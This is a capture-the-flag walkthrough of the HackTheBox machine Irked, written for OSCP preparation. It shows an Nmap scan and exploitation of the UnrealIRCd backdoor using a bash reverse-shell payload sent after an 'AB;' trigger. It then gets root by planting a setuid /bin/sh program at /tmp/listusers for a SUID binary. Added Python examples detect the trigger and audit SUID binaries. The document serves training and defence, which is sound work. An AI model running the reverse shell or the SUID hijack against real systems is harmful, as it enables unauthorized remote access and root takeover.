TJ_Null’s OSCP prep – HTB – Irked
Another Linux box from TJ_Null's OSCP prep list. This was a pretty interesting box with an attack vector I had not seen before. It is a straightforward box with no trickery. You can use Metasploit to get initial access, but as I've stated earlier I will refrain from using Metasploit.
Edit: After watching IPPSEC's walkthrough video I noticed that I missed some steps. Even though I got root access to this machine, there was a steganography hint in the photo on the webserver. In djmardov's folder there was a .backup file with a hint pointing to steganography, and djmardov's password was hidden in the photo. With it you could SSH in to his account.
Enumeration
I ran the usual Nmap scans. There were many open ports on this box, but the most interesting were 6697 and 8067 with the IRC service (UnrealIRCd) running on them.
┌─[root@parrotos]─[/home/aghanim/Desktop/HTB/irked]
└──╼ #nmap -sV -sC -A -p- --min-rate 10000 10.10.10.117 -oN nmap.result
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-03 20:48 GMT
Stats: 0:02:44 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 20:51 (0:00:00 remaining)
Warning: 10.10.10.117 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.117
Host is up (0.043s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: Site doesnt have a title (text/html).
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 35586/tcp6 status
| 100024 1 44788/tcp status
| 100024 1 47670/udp status
|_ 100024 1 54828/udp6 status
2488/tcp filtered moy-corp
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
15636/tcp filtered unknown
16471/tcp filtered unknown
27107/tcp filtered unknown
44788/tcp open status 1 (RPC #100024)
47072/tcp filtered unknown
60340/tcp filtered unknown
65534/tcp open irc UnrealIRCd
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/3%OT=22%CT=1%CU=36187%PV=Y%DS=2%DC=T%G=Y%TM=61D3621E
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8)SEQ(
OS:SP=107%GCD=1%ISR=10A%TI=Z%CI=I%TS=8)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3
OS:=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=7
OS:120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 38.30 ms 10.10.14.1
2 38.53 ms 10.10.10.117
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 228.62 seconds
A quick Google search shows that there is a known backdoor vulnerability in UnrealIRCd which I can use to get initial access to the box.
Initial Access
To get initial access I will use Ranger11Danger's Python script. The payload in the script is
s.sendall((f'AB; {gen_payload(python_payload)} \n').encode())
which sends the characters AB;, the payload, and then a newline. The payload here will be a reverse shell:
bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1
Start a netcat listener on your attacking machine and run the script with the command
python3 exploit.py -payload bash target_ip target_port
It didn't work the first couple of times, so I had to run it multiple times before it worked. I got a shell as the user ircd.
I couldn't read user.txt since it was owned by another user named djmardov.
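Seen from the defensive side, the trigger described above is easy to spot on the wire: the backdoored UnrealIRCd reacts to a line that begins with the literal characters AB; on one of its listening ports, so a network sensor or an IRC server log can match exactly that. The following Python script is an added example of such a check and is not part of the original post or of the exploit script; the log line format and the sample records are constructed for the example, and the port set is taken from the Nmap scan above plus the conventional IRC port 6667.

```python
import re
from typing import Dict, List

# Literal prefix the backdoored UnrealIRCd build reacts to when it appears at
# the start of a line sent to the server (the exploit script above sends "AB; <cmd>\n").
BACKDOOR_TRIGGER = "AB;"

# IRC ports: 6667 is the conventional one, the other three are from the Nmap scan.
IRC_PORTS = {6667, 6697, 8067, 65534}

# Constructed log format (an assumption for this example): one client->server
# record per line: "<timestamp> <src_ip> -> <dst_ip>:<dst_port> <payload>".
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+->\s+(?P<dst>[\d.]+):(?P<port>\d+)\s+(?P<payload>.*)$"
)

# Constructed sample records, not real traffic from the box.
SAMPLE_IRC_LINES = [
    "2022-01-03T20:55:01 10.10.14.20 -> 10.10.10.117:6697 NICK recon",
    "2022-01-03T20:55:01 10.10.14.20 -> 10.10.10.117:6697 USER recon 0 * :recon",
    "2022-01-03T20:55:03 10.10.14.20 -> 10.10.10.117:6697 AB; id",
    "2022-01-03T20:55:09 10.10.14.21 -> 10.10.10.117:6697 PRIVMSG #lobby :AB; mentioned mid-message",
    "2022-01-03T20:56:00 10.10.14.22 -> 10.10.10.117:80 AB; not an IRC port",
    "2022-01-03T20:56:30 10.10.14.23 -> 10.10.10.117:8067 AB;",
]


def detect_backdoor_trigger(lines: List[str], irc_ports=IRC_PORTS) -> List[Dict[str, str]]:
    """Return one finding per record whose payload starts with the trigger on an IRC port.

    Matching only at the start of the payload mirrors how the backdoor itself
    parses its input and keeps a chat message that merely contains "AB;" from firing.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # ignore records that do not fit the expected format
        if int(m.group("port")) not in irc_ports:
            continue
        if not m.group("payload").startswith(BACKDOOR_TRIGGER):
            continue
        findings.append({
            "time": m.group("ts"),
            "src": m.group("src"),
            "dst_port": m.group("port"),
            "payload": m.group("payload"),
        })
    return findings


def summarize(findings: List[Dict[str, str]]) -> str:
    """Human-readable one-line-per-hit summary for an alert or a report."""
    return "\n".join(
        f"{f['time']} backdoor trigger from {f['src']} on port {f['dst_port']}: {f['payload']!r}"
        for f in findings
    )


if __name__ == "__main__":
    print(summarize(detect_backdoor_trigger(SAMPLE_IRC_LINES)))
```

Running the script flags two of the six constructed records: the one on port 6697 and the bare trigger on port 8067. The PRIVMSG that mentions AB; in the middle of the text and the request to port 80 are left alone, which is the behaviour you want from a signature on this trigger.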
Root
Rooting this box was kinda similar to the box Lame, abusing files with the SUID bit set. Listing all files with the SUID bit set using the command
find / -type f -perm -04000 -ls 2>/dev/null
we get the following list.
404330 356 -rwsr-xr-- 1 root messagebus 362672 Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
394848 12 -rwsr-xr-x 1 root root 9468 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
412270 16 -rwsr-xr-x 1 root root 13816 Sep 8 2016 /usr/lib/policykit-1/polkit-agent-helper-1
410047 552 -rwsr-xr-x 1 root root 562536 Nov 19 2017 /usr/lib/openssh/ssh-keysign
408970 16 -rwsr-xr-x 1 root root 13564 Oct 14 2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
409724 1060 -rwsr-xr-x 1 root root 1085300 Feb 10 2018 /usr/sbin/exim4
424276 332 -rwsr-xr-- 1 root dip 338948 Apr 14 2015 /usr/sbin/pppd
394369 44 -rwsr-xr-x 1 root root 43576 May 17 2017 /usr/bin/chsh
410065 96 -rwsr-sr-x 1 root mail 96192 Nov 18 2017 /usr/bin/procmail
394371 80 -rwsr-xr-x 1 root root 78072 May 17 2017 /usr/bin/gpasswd
393000 40 -rwsr-xr-x 1 root root 38740 May 17 2017 /usr/bin/newgrp
409644 52 -rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at
412272 20 -rwsr-xr-x 1 root root 18072 Sep 8 2016 /usr/bin/pkexec
424835 12 -rwsr-sr-x 1 root root 9468 Apr 1 2014 /usr/bin/X
394373 52 -rwsr-xr-x 1 root root 53112 May 17 2017 /usr/bin/passwd
394368 52 -rwsr-xr-x 1 root root 52344 May 17 2017 /usr/bin/chfn
1062682 8 -rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser
914060 96 -rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs
783487 40 -rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su
783401 36 -rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount
792821 36 -rwsr-xr-x 1 root root 34208 Jan 21 2016 /bin/fusermount
792836 160 -rwsr-xr-x 1 root root 161584 Jan 28 2017 /bin/ntfs-3g
783402 28 -rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount
The one file that stood out was viewuser, which is not a known binary. Taking a closer look at the binary we find that it calls another binary, /tmp/listusers, a path in a directory that any user can write to.
So in /tmp we create a listusers binary, which will be called when we run /bin/viewuser.
ircd@irked:/tmp$ cat listusers.c
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid() */

int main(int argc, char **argv) {
    setuid(0);            /* become root; works because viewuser is SUID root */
    system("/bin/sh -i"); /* the -i makes the shell interactive */
    return 0;
}
ircd@irked:/tmp$ gcc listusers.c -o listusers
So what this binary does is set our UID to 0 (root) and then run /bin/sh with the -i (interactive) parameter. We then compile it with gcc and run viewuser, which executes our /tmp/listusers as root.
As you can see, we are now root and can read both user.txt and root.txt. Interestingly enough, the password to djmardov's user was in the root directory.
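The privilege escalation works because a root-owned SUID program (viewuser) executes a path under /tmp, a directory every local user can write to, so anyone can substitute the program it runs. From a hardening point of view, the two observations the walkthrough made by hand can be automated: list the SUID binaries, flag those the distribution's packages do not account for, and inspect which paths the flagged ones embed. The following Python script is an added example of such an audit and is not code from the original post or from the box; it parses the find -ls listing format shown above. The baseline set of expected SUID paths, the listing subset and the byte blob standing in for the viewuser binary are constructed for the example, and the set of world-writable directories it checks for is an assumption based on a stock Debian layout.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Directories assumed world-writable on a stock Debian system; a SUID program
# that executes anything under these can be hijacked by any local user.
WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed baseline: SUID paths expected from the installed Debian packages.
# On a real host this would come from the package manager, not a hand-written list.
EXPECTED_SUID: Set[str] = {
    "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/pkexec", "/bin/su", "/bin/mount", "/bin/umount",
    "/usr/sbin/exim4", "/usr/lib/openssh/ssh-keysign",
}

# Constructed subset of the `find / -type f -perm -04000 -ls` listing above.
SAMPLE_LISTING = """\
394373 52 -rwsr-xr-x 1 root root 53112 May 17 2017 /usr/bin/passwd
412272 20 -rwsr-xr-x 1 root root 18072 Sep 8 2016 /usr/bin/pkexec
1062682 8 -rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser
783487 40 -rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su
409644 52 -rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at
"""

# Constructed stand-in for the contents of the viewuser binary: a few ELF-like
# header bytes followed by the kind of string table a real build would carry.
SAMPLE_VIEWUSER_BYTES = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
    + b"setuid\x00system\x00/tmp/listusers\x00/lib64/ld-linux-x86-64.so.2\x00"
)


@dataclass
class SuidEntry:
    mode: str
    owner: str
    group: str
    path: str

    @property
    def root_owned(self) -> bool:
        # The 's' in the owner-execute slot is the SUID bit; root-owned ones matter most.
        return self.owner == "root" and self.mode[3] == "s"


def parse_find_ls(listing: str) -> List[SuidEntry]:
    """Parse `find -ls` lines: inode blocks mode links owner group size month day year path."""
    entries = []
    for line in listing.splitlines():
        parts = line.split()
        if len(parts) < 11:
            continue  # not a find -ls record
        entries.append(SuidEntry(mode=parts[2], owner=parts[4], group=parts[5],
                                 path=" ".join(parts[10:])))
    return entries


def unexpected_suid(entries: List[SuidEntry], baseline: Set[str]) -> List[str]:
    """Root-owned SUID binaries that the package baseline does not account for."""
    return [e.path for e in entries if e.root_owned and e.path not in baseline]


def writable_dir_refs(data: bytes) -> List[str]:
    """Printable strings in a binary that point into a world-writable directory."""
    strings = [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{4,}", data)]
    return [s for s in strings
            if any(s == p.rstrip("/") or s.startswith(p) for p in WRITABLE_PREFIXES)]


def audit(listing: str, baseline: Set[str], contents: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Map each unexpected root SUID binary to the writable paths it embeds (empty if none)."""
    report = {}
    for path in unexpected_suid(parse_find_ls(listing), baseline):
        blob: Optional[bytes] = contents.get(path)
        report[path] = writable_dir_refs(blob) if blob is not None else []
    return report


if __name__ == "__main__":
    result = audit(SAMPLE_LISTING, EXPECTED_SUID, {"/usr/bin/viewuser": SAMPLE_VIEWUSER_BYTES})
    for path, refs in result.items():
        print(f"{'HIJACKABLE' if refs else 'review'}: {path} references {refs}")
```

On the constructed input only /usr/bin/viewuser is outside the baseline, and its string table points at /tmp/listusers, so the audit reports it as hijackable; /usr/bin/at is skipped because it is not root-owned. The remediation is the same whatever the audit finds: a SUID helper must only execute programs from root-owned directories that other users cannot write to, or the SUID bit should be removed from it.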